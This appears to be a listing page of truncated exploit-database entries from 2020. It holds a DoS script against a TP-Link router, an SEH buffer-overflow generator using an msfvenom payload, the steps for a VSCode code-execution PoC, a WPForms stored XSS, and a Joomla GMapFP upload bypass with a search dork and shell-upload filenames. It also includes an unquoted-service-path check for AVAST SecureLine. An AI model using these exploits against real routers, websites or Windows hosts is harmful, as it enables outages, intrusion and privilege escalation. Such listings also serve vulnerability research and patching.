
Posts

Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)

# Exploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC) # Author: Hosein Askari # Date: 2020-03-18 # Vendor Homepage: https://mikrotik.com/ # Model: hAP lite # Processor architecture: smips # Affected Version: through 6.44.3 # CVE: N/A # Description: An uncontrolled resource consumption vulnerability in the SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with the SIGPIPE signal (SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management. # Details: The issue was reported to MikroTik on 02/25/2020. First response by MikroTik on 02/26/2020. The additional information about exploit and PoC vi...

Microsoft VSCode Python Extension - Code Execution

# VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the [Visual Studio Code](https://code.visualstudio.com/) Python extension. >TL;DR: VSCode may use code from a virtualenv found in the project folders without asking the user, for things such as formatting, autocompletion, etc. This insecure design leads to arbitrary code execution by simply cloning and opening a malicious Python repository. You can read more about this vulnerability on our blog: [https://blog.doyensec.com/2020/03/16/vscode_codeexec.html](https://blog.doyensec.com/2020/03/16/vscode_codeexec.html). ## HowTo - Clone the 'malicious' repository with `git clone https://github.com/doyensec/VSCode_PoC_Oct2019.git` - Add the cloned repo to a VSCode workspace on macOS. Note that the vulnerability affects all platforms, but the PoC executes *Calculator.app* - Open `test.py` in VSCode Download ~ https://github.com/offensive-s...

Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)

# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH) # Date: 2020-03-26 # Author: Felipe Winsnes # Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe # Version: 2.7.3.700 # Tested on: Windows 7 (x86) # Proof of Concept: # 1.- Run the python script, it will create a new file "poc.txt" # 2.- Copy the content of the new file 'poc.txt' to the clipboard # 3.- Open the Application # 4.- If the 'Preferences' window pops up, just click 'Cancel' # 5.- Click 'Batch' # 6.- Delete everything in the parameter 'Input:' and paste the clipboard there # 7.- Select OK # 8.- Some Windows message boxes will pop up, click OK. # 9.- Profit # Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/ import struct import sys # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alph...

TP-Link Archer C50 3 - Denial of Service (PoC)

# Exploit Title: TP-Link Archer C50 3 - Denial of Service (PoC) # Date: 2020-01-25 # Exploit Author: thewhiteh4t # Vendor Homepage: https://www.tp-link.com/ # Version: TP-Link Archer C50 v3 Build 171227 # Tested on: Arch Linux x64 # CVE: CVE-2020-9375 # Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html import time import socket ip = '192.168.0.1' port = 80 print('[+] IP : ' + ip) print('[+] Port : ' + str(port)) for i in range(2): time.sleep(1) try: print('[+] Initializing Socket...') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) print('[!] Connecting to target...') s.connect((ip, port)) header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n'.format(ip...

Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting

# Exploit Title: Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting # Date: 2020-02-18 # Vendor Homepage: https://wpforms.com # Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers # Exploit Author: Jinson Varghese Behanan # Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-wpforms-plugin/ # Author Homepage: https://www.jinsonvarghese.com # Version: 1.5.8.2 and below # CVE : CVE-2020-10385 1. Description WPForms is a popular WordPress forms plugin with over 3 million active installations. The Form Description and Field Description fields in the WPForms plugin's Form Builder module were found to be vulnerable to stored XSS, as they did not sanitize user-supplied input properly. While they do not pose a high security threat, being an authenticated XSS vulnerability, an attacker can potentially exploit this to perform malicious actions on a WordPress multisite installation to have a super admin's cookies sen...

Joomla! Component GMapFP 3.30 - Arbitrary File Upload

# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload # Google Dork: inurl:''com_gmapfp'' # Date: 2020-03-25 # Exploit Author: ThelastVvV # Vendor Homepage: https://gmapfp.org/ # Version: Version J3.30pro # Tested on: Ubuntu # PoC: http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image # You can bypass the restriction by uploading your file.php.png, file2.php.jpeg, file3.html.jpg, file3.txt.jpg # Dir File Path: http://127.0.0.1/images/gmapfp/file.php or http://127.0.0.1//images/gmapfp/file.php.png # The Joomla GMapFP component 3.x allows remote attackers to upload arbitrary files (shell upload) due to unrestricted file upload. Reference: https://www.exploit-db.com/exploits/48248

AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path

# Exploit Title: AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path # Discovery by: Roberto Piña # Discovery Date: 2020-03-24 # Vendor Homepage: https://www.avast.com/ # Software Link: https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx # Tested Version: 5.5.522.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 8.1 Single Language x32 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Avast SecureLine" | findstr /i /v """ Avast SecureLine SecureLine C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe Auto C:\>sc qc SecureLine [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SecureLine TIPO : 10 WIN...